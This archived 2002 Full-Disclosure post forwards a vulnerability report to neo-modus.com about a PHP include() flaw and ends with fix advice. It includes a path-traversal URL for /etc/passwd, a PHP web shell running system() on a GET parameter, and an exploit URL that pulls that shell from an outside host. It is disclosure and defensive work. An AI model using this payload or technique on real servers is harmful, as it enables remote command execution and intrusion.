OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
burpz_at_gmx.net
Date: Wed Oct 02 2002 - 01:01:26 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    > neo-modus.com is the home of the quite popular file sharing utility
    > 'direct
    > connect', unfortunately their website is vulnerable to a common php
    > include()
    > vulnerability. Message below was send 2 weeks ago to the 'bugs' email
    > address listed on their website. I didn't get any response.
    >
    > --- Forwarded Message ---
    > > Dear Reader,
    > >
    > > I recently stumbled across your website www.neo-modus.com, I fiddled
    > > around
    > > a bit with the .php scripts, and found that they are vulnerable to a
    > very
    > > common php error.
    > >
    > > The index.php script takes a parameter 'page', so it knows what page to
    > > show. It then passes the value of this parameter DIRECTLY into a
    > include()
    > > statement. This is very, very bad. Let's say I go to the url:
    > > http://www.neo-modus.com/?page=/etc/passwd - this tries to open
    > > /etc/passwd.html - so i can break
    > > out of the document root and view every file with an .html (or .php?)
    > > extension. This seems not too bad, but there's more. PHP has a feature
    > > called
    > > "furl_open", which allows include() to take an URL as a parameter to
    > > include it in
    > > it's page. So we create a text file on a different webserver (which
    > doesnt
    > > parse .txt files) called test.txt, which contains:
    > >
    > > <?php
    > > printf("<div align=\"left\"><pre>");
    > > printf("%s", nl2br(system($HTTP_GET_VARS['cmd'])));
    > > printf("</pre></div>");
    > > ?>
    > >
    > > we then go to the url
    > > http://www.neo-modus.com/?page=http://my.webpage.com/test.txt&cmd=ls -al
    > >
    > > and we get a nice "ls -al" output runned on YOUR webserver. We can run
    > all
    > > commands with privileges of the webserver. I think you can understand
    > how
    > > bad
    > > this is.
    > >
    > > To fix these issues, I suggest you disable furl_open in the php
    > > configuration file, and filter the "page" parameter passed to index.php
    > so
    > > that it strips
    > > slashes, backslashes, dots and limits it to a specific directory only.
    > >
    > > Another thing: don't place files which contain password information in
    > the
    > > document root. ConnectToDatabase.php contains sensitive information.
    > > Change
    > > your mysql passwords, and limit access to the mysql server from YOUR
    > > website
    > > host only. I could connect without problems - this should not be the
    > case.
    > > 

    -- 
+++ GMX - Mail, Messaging & more  http://www.gmx.net +++
NEU: Mit GMX ins Internet. Günstige DSL- & Modem/ISDN-Tarife!

    _______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html